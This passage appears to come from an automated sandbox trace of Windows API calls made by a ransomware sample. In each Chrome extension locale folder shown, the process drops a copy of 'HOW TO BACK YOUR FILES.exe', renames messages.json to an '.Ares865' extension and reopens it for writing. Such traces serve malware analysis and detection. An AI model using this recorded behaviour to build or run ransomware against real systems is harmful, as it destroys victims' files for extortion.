dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.747] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=272) returned 1 [0103.750] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro" [0103.750] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro" [0103.750] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.750] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.751] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.751] GetLastError () returned 0x0 [0103.751] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.751] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f10e660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f10e660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.752] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.752] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.752] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.Ares865") returned 160 [0103.752] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.754] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=222) returned 1 [0103.756] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT" [0103.757] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT" [0103.757] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.757] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.757] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.758] GetLastError () returned 0x0 [0103.758] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.758] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1347c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1347c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.758] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.758] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.758] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.Ares865") returned 163 [0103.758] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.760] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.760] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=224) returned 1 [0103.764] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR" [0103.765] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR" [0103.765] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.765] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.765] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.766] GetLastError () returned 0x0 [0103.766] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.766] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1347c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1347c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.766] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.766] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.766] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.Ares865") returned 163 [0103.766] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.768] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.768] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=222) returned 1 [0103.773] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl" [0103.773] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl" [0103.773] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.773] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.774] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.774] GetLastError () returned 0x0 [0103.774] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.774] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1347c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1347c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.774] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.774] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.774] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.Ares865") returned 160 [0103.774] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.776] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.776] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=217) returned 1 [0103.780] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no" [0103.780] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no" [0103.780] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.780] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.781] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.781] GetLastError () returned 0x0 [0103.781] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.781] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1347c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1347c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.781] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.781] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.782] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.Ares865") returned 160 [0103.782] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.784] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=203) returned 1 [0103.788] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 